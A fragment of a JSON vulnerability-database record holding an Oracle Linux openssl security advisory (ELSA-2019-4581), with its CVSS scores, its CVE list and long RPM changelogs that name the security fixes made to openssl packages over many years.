blinding\n[0.9.7a-8]\n- rebuilt\n[0.9.7a-7]\n- Added libica-1.2 to openssl (featurerequest).\n[0.9.7a-6]\n- fix building with incorrect flags on ppc64\n[0.9.7a-5]\n- add patch to harden against Klima-Pokorny-Rosa extension of Bleichenbacher's\n attack (CAN-2003-0131)\n[ 0.9.7a-4]\n- add patch to enable RSA blinding by default, closing a timing attack\n (CAN-2003-0147)\n[0.9.7a-3]\n- disable use of BN assembly module on x86_64, but continue to allow inline\n assembly (#83403)\n[0.9.7a-2]\n- disable EC algorithms\n[0.9.7a-1]\n- update to 0.9.7a\n[0.9.7-8]\n- add fix to guard against attempts to allocate negative amounts of memory\n- add patch for CAN-2003-0078, fixing a timing attack\n[0.9.7-7]\n- Add openssl-ppc64.patch\n[0.9.7-6]\n- EVP_DecryptInit should call EVP_CipherInit() instead of EVP_CipherInit_ex(),\n to get the right behavior when passed uninitialized context structures\n (#83766)\n- build with -mcpu=ev5 on alpha family (#83828)\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[0.9.7-4]\n- Added IBM hw crypto support patch.\n* Wed Jan 15 2003 Nalin Dahyabhai \n- add missing builddep on sed\n[0.9.7-3]\n- debloat\n- fix broken manpage symlinks\n[0.9.7-2]\n- fix double-free in 'openssl ca'\n[0.9.7-1]\n- update to 0.9.7 final\n[0.9.7-0]\n- update to 0.9.7 beta6 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n* Wed Dec 11 2002 Nalin Dahyabhai \n- update to 0.9.7 beta5 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n[0.9.6b-30]\n- add configuration stanza for x86_64 and use it on x86_64\n- build for linux-ppc on ppc\n- start running the self-tests again\n[0.9.6b-29hammer.3]\n- Merge fixes from previous hammer packages, including general x86-64 and\n multilib\n[0.9.6b-29]\n- rebuild\n[0.9.6b-28]\n- update asn patch to fix accidental reversal of a logic check\n[0.9.6b-27]\n- update asn patch to reduce chance that compiler optimization will remove\n one of the added tests\n[0.9.6b-26]\n- rebuild\n[0.9.6b-25]\n- add patch to fix ASN.1 vulnerabilities\n[0.9.6b-24]\n- add backport of Ben Laurie's patches for OpenSSL 0.9.6d\n[0.9.6b-23]\n- own {_datadir}/ssl/misc\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Sun May 26 2002 Tim Powers \n- automated rebuild\n[0.9.6b-20]\n- free ride through the build system (whee!)\n[0.9.6b-19]\n- rebuild in new environment\n[0.9.6b-17, 0.9.6b-18]\n- merge RHL-specific bits into stronghold package, rename\n[stronghold-0.9.6c-2]\n- add support for Chrysalis Luna token\n* Tue Mar 26 2002 Gary Benson \n- disable AEP random number generation, other AEP fixes\n[0.9.6b-15]\n- only build subpackages on primary arches\n[0.9.6b-13]\n- on ia32, only disable use of assembler on i386\n- enable assembly on ia64\n[0.9.6b-11]\n- fix sparcv9 entry\n[stronghold-0.9.6c-1]\n- upgrade to 0.9.6c\n- bump BuildArch to i686 and enable assembler on all platforms\n- synchronise with shrimpy and rawhide\n- bump soversion to 3\n* Wed Oct 10 2001 Florian La Roche \n- delete BN_LLONG for s390x, patch from Oliver Paukstadt\n[0.9.6b-9]\n- update AEP driver patch\n* Mon Sep 10 2001 Nalin Dahyabhai \n- adjust RNG disabling patch to match version of patch from Broadcom\n[0.9.6b-8]\n- disable the RNG in the ubsec engine driver\n[0.9.6b-7]\n- tweaks to the ubsec engine driver\n[0.9.6b-6]\n- tweaks to the ubsec engine driver\n[0.9.6b-5]\n- update ubsec engine driver from Broadcom\n[0.9.6b-4]\n- move man pages back to %{_mandir}/man?/foo.?ssl from\n %{_mandir}/man?ssl/foo.?\n- add an [ engine ] section to the default configuration file\n* Thu Aug 09 2001 Nalin Dahyabhai \n- add a patch for selecting a default engine in SSL_library_init()\n[0.9.6b-3]\n- add patches for AEP hardware support\n- add patch to keep trying when we fail to load a cert from a file and\n there are more in the file\n- add missing prototype for ENGINE_ubsec() in engine_int.h\n[0.9.6b-2]\n- actually add hw_ubsec to the engine list\n* Tue Jul 17 2001 Nalin Dahyabhai \n- add in the hw_ubsec driver from CVS\n[0.9.6b-1]\n- update to 0.9.6b\n* Thu Jul 05 2001 Nalin Dahyabhai \n- move .so symlinks back to %{_libdir}\n* Tue Jul 03 2001 Nalin Dahyabhai \n- move shared libraries to /lib (#38410)\n* Mon Jun 25 2001 Nalin Dahyabhai \n- switch to engine code base\n* Mon Jun 18 2001 Nalin Dahyabhai \n- add a script for creating dummy certificates\n- move man pages from %{_mandir}/man?/foo.?ssl to %{_mandir}/man?ssl/foo.?\n* Thu Jun 07 2001 Florian La Roche \n- add s390x support\n* Fri Jun 01 2001 Nalin Dahyabhai \n- change two memcpy() calls to memmove()\n- don't define L_ENDIAN on alpha\n[stronghold-0.9.6a-1]\n- Add 'stronghold-' prefix to package names.\n- Obsolete standard openssl packages.\n* Wed May 16 2001 Joe Orton \n- Add BuildArch: i586 as per Nalin's advice.\n* Tue May 15 2001 Joe Orton \n- Enable assembler on ix86 (using new .tar.bz2 which does\n include the asm directories).\n* Tue May 15 2001 Nalin Dahyabhai \n- make subpackages depend on the main package\n* Tue May 01 2001 Nalin Dahyabhai \n- adjust the hobble script to not disturb symlinks in include/ (fix from\n Joe Orton)\n* Fri Apr 27 2001 Nalin Dahyabhai \n- drop the m2crypo patch we weren't using\n* Tue Apr 24 2001 Nalin Dahyabhai \n- configure using 'shared' as well\n* Sun Apr 08 2001 Nalin Dahyabhai \n- update to 0.9.6a\n- use the build-shared target to build shared libraries\n- bump the soversion to 2 because we're no longer compatible with\n our 0.9.5a packages or our 0.9.6 packages\n- drop the patch for making rsatest a no-op when rsa null support is used\n- put all man pages into \nssl instead of \n- break the m2crypto modules into a separate package\n* Tue Mar 13 2001 Nalin Dahyabhai \n- use BN_LLONG on s390\n* Mon Mar 12 2001 Nalin Dahyabhai \n- fix the s390 changes for 0.9.6 (isn't supposed to be marked as 64-bit)\n* Sat Mar 03 2001 Nalin Dahyabhai \n- move c_rehash to the perl subpackage, because it's a perl script now\n* Fri Mar 02 2001 Nalin Dahyabhai \n- update to 0.9.6\n- enable MD2\n- use the libcrypto.so and libssl.so targets to build shared libs with\n- bump the soversion to 1 because we're no longer compatible with any of\n the various 0.9.5a packages circulating around, which provide lib*.so.0\n* Wed Feb 28 2001 Florian La Roche \n- change hobble-openssl for disabling MD2 again\n* Tue Feb 27 2001 Nalin Dahyabhai \n- re-disable MD2 -- the EVP_MD_CTX structure would grow from 100 to 152\n bytes or so, causing EVP_DigestInit() to zero out stack variables in\n apps built against a version of the library without it\n* Mon Feb 26 2001 Nalin Dahyabhai \n- disable some inline assembly, which on x86 is Pentium-specific\n- re-enable MD2 (see http://www.ietf.org/ietf/IPR/RSA-MD-all)\n* Thu Feb 08 2001 Florian La Roche \n- fix s390 patch\n* Fri Dec 08 2000 Than Ngo \n- added support s390\n* Mon Nov 20 2000 Nalin Dahyabhai \n- remove -Wa,* and -m* compiler flags from the default Configure file (#20656)\n- add the CA.pl man page to the perl subpackage\n* Thu Nov 02 2000 Nalin Dahyabhai \n- always build with -mcpu=ev5 on alpha\n* Tue Oct 31 2000 Nalin Dahyabhai \n- add a symlink from cert.pem to ca-bundle.crt\n* Wed Oct 25 2000 Nalin Dahyabhai \n- add a ca-bundle file for packages like Samba to reference for CA certificates\n* Tue Oct 24 2000 Nalin Dahyabhai \n- remove libcrypto's crypt(), which doesn't handle md5crypt (#19295)\n* Mon Oct 02 2000 Nalin Dahyabhai \n- add unzip as a buildprereq (#17662)\n- update m2crypto to 0.05-snap4\n* Tue Sep 26 2000 Bill Nottingham \n- fix some issues in building when it's not installed\n* Wed Sep 06 2000 Nalin Dahyabhai \n- make sure the headers we include are the ones we built with (aaaaarrgh!)\n* Fri Sep 01 2000 Nalin Dahyabhai \n- add Richard Henderson's patch for BN on ia64\n- clean up the changelog\n* Tue Aug 29 2000 Nalin Dahyabhai \n- fix the building of python modules without openssl-devel already installed\n* Wed Aug 23 2000 Nalin Dahyabhai \n- byte-compile python extensions without the build-root\n- adjust the makefile to not remove temporary files (like .key files when\n building .csr files) by marking them as .PRECIOUS\n* Sat Aug 19 2000 Nalin Dahyabhai \n- break out python extensions into a subpackage\n* Mon Jul 17 2000 Nalin Dahyabhai \n- tweak the makefile some more\n* Tue Jul 11 2000 Nalin Dahyabhai \n- disable MD2 support\n* Thu Jul 06 2000 Nalin Dahyabhai \n- disable MDC2 support\n* Sun Jul 02 2000 Nalin Dahyabhai \n- tweak the disabling of RC5, IDEA support\n- tweak the makefile\n* Thu Jun 29 2000 Nalin Dahyabhai \n- strip binaries and libraries\n- rework certificate makefile to have the right parts for Apache\n* Wed Jun 28 2000 Nalin Dahyabhai \n- use %{_perl} instead of /usr/bin/perl\n- disable alpha until it passes its own test suite\n* Fri Jun 09 2000 Nalin Dahyabhai \n- move the passwd.1 man page out of the passwd package's way\n* Fri Jun 02 2000 Nalin Dahyabhai \n- update to 0.9.5a, modified for U.S.\n- add perl as a build-time requirement\n- move certificate makefile to another package\n- disable RC5, IDEA, RSA support\n- remove optimizations for now\n* Wed Mar 01 2000 Florian La Roche \n- Bero told me to move the Makefile into this package\n* Wed Mar 01 2000 Florian La Roche \n- add lib*.so symlinks to link dynamically against shared libs\n* Tue Feb 29 2000 Florian La Roche \n- update to 0.9.5\n- run ldconfig directly in post/postun\n- add FAQ\n* Sat Dec 18 1999 Bernhard Rosenkrdnzer \n- Fix build on non-x86 platforms\n* Fri Nov 12 1999 Bernhard Rosenkrdnzer \n- move /usr/share/ssl/* from -devel to main package\n* Tue Oct 26 1999 Bernhard Rosenkrdnzer \n- inital packaging\n- changes from base:\n - Move /usr/local/ssl to /usr/share/ssl for FHS compliance\n - handle RPM_OPT_FLAGS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-13T00:00:00", "type": "oraclelinux", "title": "openssl security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0078", "CVE-2003-0131", "CVE-2003-0147", "CVE-2003-0543", "CVE-2003-0544", "CVE-2003-0545", "CVE-2004-0079", "CVE-2004-0112", "CVE-2004-0975", "CVE-2005-0109", "CVE-2005-2946", "CVE-2005-2969", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4339", "CVE-2006-4343", "CVE-2007-3108", "CVE-2007-4995", "CVE-2007-5135", "CVE-2008-0891", "CVE-2008-1672", "CVE-2009-1377", "CVE-2009-1378", "CVE-2009-1379", "CVE-2009-3555", "CVE-2009-4355", "CVE-2010-0742", "CVE-2010-1633", "CVE-2010-3864", "CVE-2010-4180", "CVE-2010-5298", "CVE-2011-0014", "CVE-2011-3207", "CVE-2012-0050", "CVE-2012-2110", "CVE-2013-4353", "CVE-2013-6449", "CVE-2013-6450", "CVE-2014-0160", "CVE-2014-0195", "CVE-2014-0198", "CVE-2014-0221", "CVE-2014-0224", "CVE-2014-3470", "CVE-2014-3505", "CVE-2014-3506", "CVE-2014-3507", "CVE-2014-3508", "CVE-2014-3509", "CVE-2014-3510", "CVE-2014-3511", "CVE-2014-3513", "CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-8176", "CVE-2014-8275", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0209", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0292", "CVE-2015-0293", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1791", "CVE-2015-1792", "CVE-2015-3194", "CVE-2015-3195", "CVE-2015-3196", "CVE-2015-3197", "CVE-2015-3216", "CVE-2015-4000", "CVE-2015-7575", "CVE-2016-0702", "CVE-2016-0705", "CVE-2016-0797", "CVE-2016-0799", "CVE-2016-2105", "CVE-2016-2106", "CVE-2016-2107", "CVE-2016-2108", "CVE-2016-2109", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6304", "CVE-2016-6306", "CVE-2017-3735", "CVE-2017-3736", "CVE-2017-3737", "CVE-2017-3738", "CVE-2018-0495", "CVE-2018-0732", "CVE-2018-0737", "CVE-2018-0739", "CVE-2018-5407"], "modified": "2019-03-13T00:00:00", "id": "ELSA-2019-4581", "href": "http://linux.oracle.com/errata/ELSA-2019-4581.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T06:24:45", "description": "[1.0.1e-58.0.1]\n- Oracle bug 28730228: backport CVE-2018-0732\n- Oracle bug 28758493: backport CVE-2018-0737\n- Merge upstream patch to fix CVE-2018-0739\n- Avoid out-of-bounds read. Fixes CVE 2017-3735. By Rich Salz\n- sha256 is used for the RSA pairwise consistency test instead of sha1\n[1.0.1e-58]\n- fix CVE-2019-1559 - 0-byte record padding oracle\n[1.0.1e-57]\n- fix CVE-2017-3731 - DoS via truncated packets with RC4-MD5 cipher\n[1.0.1e-55]\n- fix CVE-2016-8610 - DoS of single-threaded servers via excessive alerts\n[1.0.1e-54]\n- fix handling of ciphersuites present after the FALLBACK_SCSV\n ciphersuite entry (#1386350)\n[1.0.1e-53]\n- add README.legacy-settings\n[1.0.1e-52]\n- deprecate and disable verification of insecure hash algorithms\n- disallow DH keys with less than 1024 bits in TLS client\n- remove support for weak and export ciphersuites\n- use correct digest when exporting keying material in TLS1.2 (#1376741)\n[1.0.1e-50]\n- fix CVE-2016-2177 - possible integer overflow\n- fix CVE-2016-2178 - non-constant time DSA operations\n- fix CVE-2016-2179 - further DoS issues in DTLS\n- fix CVE-2016-2180 - OOB read in TS_OBJ_print_bio()\n- fix CVE-2016-2181 - DTLS1 replay protection and unprocessed records issue\n- fix CVE-2016-2182 - possible buffer overflow in BN_bn2dec()\n- fix CVE-2016-6302 - insufficient TLS session ticket HMAC length check\n- fix CVE-2016-6304 - unbound memory growth with OCSP status request\n- fix CVE-2016-6306 - certificate message OOB reads\n- mitigate CVE-2016-2183 - degrade all 64bit block ciphers and RC4 to\n 112 bit effective strength\n- replace expired testing certificates\n[1.0.1e-49]\n- fix CVE-2016-2105 - possible overflow in base64 encoding\n- fix CVE-2016-2106 - possible overflow in EVP_EncryptUpdate()\n- fix CVE-2016-2107 - padding oracle in stitched AES-NI CBC-MAC\n- fix CVE-2016-2108 - memory corruption in ASN.1 encoder\n- fix CVE-2016-2109 - possible DoS when reading ASN.1 data from BIO\n- fix CVE-2016-0799 - memory issues in BIO_printf\n[1.0.1e-48]\n- fix CVE-2016-0702 - side channel attack on modular exponentiation\n- fix CVE-2016-0705 - double-free in DSA private key parsing\n- fix CVE-2016-0797 - heap corruption in BN_hex2bn and BN_dec2bn\n[1.0.1e-47]\n- fix CVE-2015-3197 - SSLv2 ciphersuite enforcement\n- disable SSLv2 in the generic TLS method\n[1.0.1e-46]\n- fix 1-byte memory leak in pkcs12 parse (#1229871)\n- document some options of the speed command (#1197095)\n[1.0.1e-45]\n- fix high-precision timestamps in timestamping authority\n[1.0.1e-44]\n- fix CVE-2015-7575 - disallow use of MD5 in TLS1.2\n[1.0.1e-43]\n- fix CVE-2015-3194 - certificate verify crash with missing PSS parameter\n- fix CVE-2015-3195 - X509_ATTRIBUTE memory leak\n- fix CVE-2015-3196 - race condition when handling PSK identity hint\n[1.0.1e-42]\n- fix regression caused by mistake in fix for CVE-2015-1791\n[1.0.1e-41]\n- improved fix for CVE-2015-1791\n- add missing parts of CVE-2015-0209 fix for corectness although unexploitable\n[1.0.1e-40]\n- fix CVE-2014-8176 - invalid free in DTLS buffering code\n- fix CVE-2015-1789 - out-of-bounds read in X509_cmp_time\n- fix CVE-2015-1790 - PKCS7 crash with missing EncryptedContent\n- fix CVE-2015-1791 - race condition handling NewSessionTicket\n- fix CVE-2015-1792 - CMS verify infinite loop with unknown hash function\n[1.0.1e-39]\n- fix CVE-2015-3216 - regression in RAND locking that can cause segfaults on\n read in multithreaded applications\n[1.0.1e-38]\n- fix CVE-2015-4000 - prevent the logjam attack on client - restrict\n the DH key size to at least 768 bits (limit will be increased in future)\n[1.0.1e-37]\n- drop the AES-GCM restriction of 2^32 operations because the IV is\n always 96 bits (32 bit fixed field + 64 bit invocation field)\n[1.0.1e-36]\n- update fix for CVE-2015-0287 to what was released upstream\n[1.0.1e-35]\n- fix CVE-2015-0209 - potential use after free in d2i_ECPrivateKey()\n- fix CVE-2015-0286 - improper handling of ASN.1 boolean comparison\n- fix CVE-2015-0287 - ASN.1 structure reuse decoding memory corruption\n- fix CVE-2015-0288 - X509_to_X509_REQ NULL pointer dereference\n- fix CVE-2015-0289 - NULL dereference decoding invalid PKCS#7 data\n- fix CVE-2015-0292 - integer underflow in base64 decoder\n- fix CVE-2015-0293 - triggerable assert in SSLv2 server\n[1.0.1e-34]\n- copy digest algorithm when handling SNI context switch\n- improve documentation of ciphersuites - patch by Hubert Kario\n- add support for setting Kerberos service and keytab in\n s_server and s_client\n[1.0.1e-33]\n- fix CVE-2014-3570 - incorrect computation in BN_sqr()\n- fix CVE-2014-3571 - possible crash in dtls1_get_record()\n- fix CVE-2014-3572 - possible downgrade of ECDH ciphersuite to non-PFS state\n- fix CVE-2014-8275 - various certificate fingerprint issues\n- fix CVE-2015-0204 - remove support for RSA ephemeral keys for non-export\n ciphersuites and on server\n- fix CVE-2015-0205 - do not allow unauthenticated client DH certificate\n- fix CVE-2015-0206 - possible memory leak when buffering DTLS records\n[1.0.1e-32]\n- use FIPS approved method for computation of d in RSA\n[1.0.1e-31]\n- fix CVE-2014-3567 - memory leak when handling session tickets\n- fix CVE-2014-3513 - memory leak in srtp support\n- add support for fallback SCSV to partially mitigate CVE-2014-3566\n (padding attack on SSL3)\n[1.0.1e-30]\n- add ECC TLS extensions to DTLS (#1119800)\n[1.0.1e-29]\n- fix CVE-2014-3505 - doublefree in DTLS packet processing\n- fix CVE-2014-3506 - avoid memory exhaustion in DTLS\n- fix CVE-2014-3507 - avoid memory leak in DTLS\n- fix CVE-2014-3508 - fix OID handling to avoid information leak\n- fix CVE-2014-3509 - fix race condition when parsing server hello\n- fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS\n- fix CVE-2014-3511 - disallow protocol downgrade via fragmentation\n[1.0.1e-28]\n- fix CVE-2014-0224 fix that broke EAP-FAST session resumption support\n[1.0.1e-26]\n- drop EXPORT, RC2, and DES from the default cipher list (#1057520)\n- print ephemeral key size negotiated in TLS handshake (#1057715)\n- do not include ECC ciphersuites in SSLv2 client hello (#1090952)\n- properly detect encryption failure in BIO (#1100819)\n- fail on hmac integrity check if the .hmac file is empty (#1105567)\n- FIPS mode: make the limitations on DSA, DH, and RSA keygen\n length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment\n variable is set\n[1.0.1e-25]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-24]\n- add back support for secp521r1 EC curve\n[1.0.1e-23]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-22]\n- use 2048 bit RSA key in FIPS selftests\n[1.0.1e-21]\n- add DH_compute_key_padded needed for FIPS CAVS testing\n- make 3des strength to be 128 bits instead of 168 (#1056616)\n- FIPS mode: do not generate DSA keys and DH parameters < 2048 bits\n- FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys)\n- FIPS mode: add DH selftest\n- FIPS mode: reseed DRBG properly on RAND_add()\n- FIPS mode: add RSA encrypt/decrypt selftest\n- FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key\n- use the key length from configuration file if req -newkey rsa is invoked\n[1.0.1e-20]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n[1.0.1e-19]\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1.0.1e-18]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n[1.0.1e-17]\n- add back some no-op symbols that were inadvertently dropped\n[1.0.1e-16]\n- do not advertise ECC curves we do not support\n- fix CPU identification on Cyrix CPUs\n[1.0.1e-15]\n- make DTLS1 work in FIPS mode\n- avoid RSA and DSA 512 bits and Whirlpool in 'openssl speed' in FIPS mode\n[1.0.1e-14]\n- installation of dracut-fips marks that the FIPS module is installed\n[1.0.1e-13]\n- avoid dlopening libssl.so from libcrypto\n[1.0.1e-12]\n- fix small memory leak in FIPS aes selftest\n- fix segfault in openssl speed hmac in the FIPS mode\n[1.0.1e-11]\n- document the nextprotoneg option in manual pages\n original patch by Hubert Kario\n[1.0.1e-9]\n- always perform the FIPS selftests in library constructor\n if FIPS module is installed\n[1.0.1e-8]\n- fix use of rdrand if available\n- more commits cherry picked from upstream\n- documentation fixes\n[1.0.1e-7]\n- additional manual page fix\n- use symbol versioning also for the textual version\n[1.0.1e-6]\n- additional manual page fixes\n- cleanup speed command output for ECDH ECDSA\n[1.0.1e-5]\n- use _prefix macro\n[1.0.1e-4]\n- add relro linking flag\n[1.0.1e-2]\n- add support for the -trusted_first option for certificate chain verification\n[1.0.1e-1]\n- rebase to the 1.0.1e upstream version\n[1.0.0-28]\n- fix for CVE-2013-0169 - SSL/TLS CBC timing attack (#907589)\n- fix for CVE-2013-0166 - DoS in OCSP signatures checking (#908052)\n- enable compression only if explicitly asked for or OPENSSL_DEFAULT_ZLIB\n environment variable is set (fixes CVE-2012-4929 #857051)\n- use __secure_getenv() everywhere instead of getenv() (#839735)\n[1.0.0-27]\n- fix sslrand(1) and sslpasswd(1) reference in openssl(1) manpage (#841645)\n- drop superfluous lib64 fixup in pkgconfig .pc files (#770872)\n- force BIO_accept_new(*:\n) to listen on IPv4\n[1.0.0-26]\n- use PKCS#8 when writing private keys in FIPS mode as the old\n PEM encryption mode is not FIPS compatible (#812348)\n[1.0.0-25]\n- fix for CVE-2012-2333 - improper checking for record length in DTLS (#820686)\n- properly initialize tkeylen in the CVE-2012-0884 fix\n[1.0.0-24]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)\n[1.0.0-23]\n- fix problem with the SGC restart patch that might terminate handshake\n incorrectly\n- fix for CVE-2012-0884 - MMA weakness in CMS and PKCS#7 code (#802725)\n- fix for CVE-2012-1165 - NULL read dereference on bad MIME headers (#802489)\n[1.0.0-22]\n- fix incorrect encryption of unaligned chunks in CFB, OFB and CTR modes\n[1.0.0-21]\n- fix for CVE-2011-4108 & CVE-2012-0050 - DTLS plaintext recovery\n vulnerability and additional DTLS fixes (#771770)\n- fix for CVE-2011-4576 - uninitialized SSL 3.0 padding (#771775)\n- fix for CVE-2011-4577 - possible DoS through malformed RFC 3779 data (#771778)\n- fix for CVE-2011-4619 - SGC restart DoS attack (#771780)\n[1.0.0-20]\n- fix x86cpuid.pl - patch by Paolo Bonzini\n[1.0.0-19]\n- add known answer test for SHA2 algorithms\n[1.0.0-18]\n- fix missing initialization of a variable in the CHIL engine (#740188)\n[1.0.0-17]\n- initialize the X509_STORE_CTX properly for CRL lookups - CVE-2011-3207\n (#736087)\n[1.0.0-16]\n- merge the optimizations for AES-NI, SHA1, and RC4 from the intelx\n engine to the internal implementations\n[1.0.0-15]\n- better documentation of the available digests in apps (#693858)\n- backported CHIL engine fixes (#693863)\n- allow testing build without downstream patches (#708511)\n- enable partial RELRO when linking (#723994)\n- add intelx engine with improved performance on new Intel CPUs\n- add OPENSSL_DISABLE_AES_NI environment variable which disables\n the AES-NI support (does not affect the intelx engine)\n[1.0.0-14]\n- use the AES-NI engine in the FIPS mode\n[1.0.0-11]\n- add API necessary for CAVS testing of the new DSA parameter generation\n[1.0.0-10]\n- fix OCSP stapling vulnerability - CVE-2011-0014 (#676063)\n- correct the README.FIPS document\n[1.0.0-8]\n- add -x931 parameter to openssl genrsa command to use the ANSI X9.31\n key generation method\n- use FIPS-186-3 method for DSA parameter generation\n- add OPENSSL_FIPS_NON_APPROVED_MD5_ALLOW environment variable\n to allow using MD5 when the system is in the maintenance state\n even if the /proc fips flag is on\n- make openssl pkcs12 command work by default in the FIPS mode\n[1.0.0-7]\n- listen on ipv6 wildcard in s_server so we accept connections\n from both ipv4 and ipv6 (#601612)\n- fix openssl speed command so it can be used in the FIPS mode\n with FIPS allowed ciphers (#619762)\n[1.0.0-6]\n- disable code for SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG - CVE-2010-3864\n (#649304)\n[1.0.0-5]\n- fix race in extension parsing code - CVE-2010-3864 (#649304)\n[1.0.0-4]\n- openssl man page fix (#609484)\n[1.0.0-3]\n- fix wrong ASN.1 definition of OriginatorInfo - CVE-2010-0742 (#598738)\n- fix information leak in rsa_verify_recover - CVE-2010-1633 (#598732)\n[1.0.0-2]\n- make CA dir readable - the private keys are in private subdir (#584810)\n- a few fixes from upstream CVS\n- make X509_NAME_hash_old work in FIPS mode (#568395)\n[1.0.0-1]\n- update to final 1.0.0 upstream release\n[1.0.0-0.22.beta5]\n- make TLS work in the FIPS mode\n[1.0.0-0.21.beta5]\n- gracefully handle zero length in assembler implementations of\n OPENSSL_cleanse (#564029)\n- do not fail in s_server if client hostname not resolvable (#561260)\n[1.0.0-0.20.beta5]\n- new upstream release\n[1.0.0-0.19.beta4]\n- fix CVE-2009-4355 - leak in applications incorrectly calling\n CRYPTO_free_all_ex_data() before application exit (#546707)\n- upstream fix for future TLS protocol version handling\n[1.0.0-0.18.beta4]\n- add support for Intel AES-NI\n[1.0.0-0.17.beta4]\n- upstream fix compression handling on session resumption\n- various null checks and other small fixes from upstream\n- upstream changes for the renegotiation info according to the latest draft\n[1.0.0-0.16.beta4]\n- fix non-fips mingw build (patch by Kalev Lember)\n- add IPV6 fix for DTLS\n[1.0.0-0.15.beta4]\n- add better error reporting for the unsafe renegotiation\n[1.0.0-0.14.beta4]\n- fix build on s390x\n[1.0.0-0.13.beta4]\n- disable enforcement of the renegotiation extension on the client (#537962)\n- add fixes from the current upstream snapshot\n[1.0.0-0.12.beta4]\n- keep the beta status in version number at 3 so we do not have to rebuild\n openssh and possibly other dependencies with too strict version check\n[1.0.0-0.11.beta4]\n- update to new upstream version, no soname bump needed\n- fix CVE-2009-3555 - note that the fix is bypassed if SSL_OP_ALL is used\n so the compatibility with unfixed clients is not broken. The\n protocol extension is also not final.\n[1.0.0-0.10.beta3]\n- fix use of freed memory if SSL_CTX_free() is called before\n SSL_free() (#521342)\n[1.0.0-0.9.beta3]\n- fix typo in DTLS1 code (#527015)\n- fix leak in error handling of d2i_SSL_SESSION()\n[1.0.0-0.8.beta3]\n- fix RSA and DSA FIPS selftests\n- reenable fixed x86_64 camellia assembler code (#521127)\n[1.0.0-0.7.beta3]\n- temporarily disable x86_64 camellia assembler code (#521127)\n[1.0.0-0.6.beta3]\n- fix openssl dgst -dss1 (#520152)\n[1.0.0-0.5.beta3]\n- drop the compat symlink hacks\n[1.0.0-0.4.beta3]\n- constify SSL_CIPHER_description()\n[1.0.0-0.3.beta3]\n- fix WWW:Curl:Easy reference in tsget\n[1.0.0-0.2.beta3]\n- enable MD-2\n[1.0.0-0.1.beta3]\n- update to new major upstream release\n[0.9.8k-7]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Wed Jul 22 2009 Bill Nottingham \n- do not build special 'optimized' versions for i686, as that's the base\n arch in Fedora now\n[0.9.8k-6]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n- make CA dir absolute path (#445344)\n- change default length for RSA key generation to 2048 (#484101)\n[0.9.8k-5]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8k-4]\n- support compatibility DTLS mode for CISCO AnyConnect (#464629)\n[0.9.8k-3]\n- correct the SHLIB_VERSION define\n[0.9.8k-2]\n- add support for multiple CRLs with same subject\n- load only dynamic engine support in FIPS mode\n[0.9.8k-1]\n- update to new upstream release (minor bug fixes, security\n fixes and machine code optimizations only)\n[0.9.8j-10]\n- move libraries to /usr/lib (#239375)\n[0.9.8j-9]\n- add a static subpackage\n[0.9.8j-8]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[0.9.8j-7]\n- must also verify checksum of libssl.so in the FIPS mode\n- obtain the seed for FIPS rng directly from the kernel device\n- drop the temporary symlinks\n[0.9.8j-6]\n- drop the temporary triggerpostun and symlinking in post\n- fix the pkgconfig files and drop the unnecessary buildrequires\n on pkgconfig as it is a rpmbuild 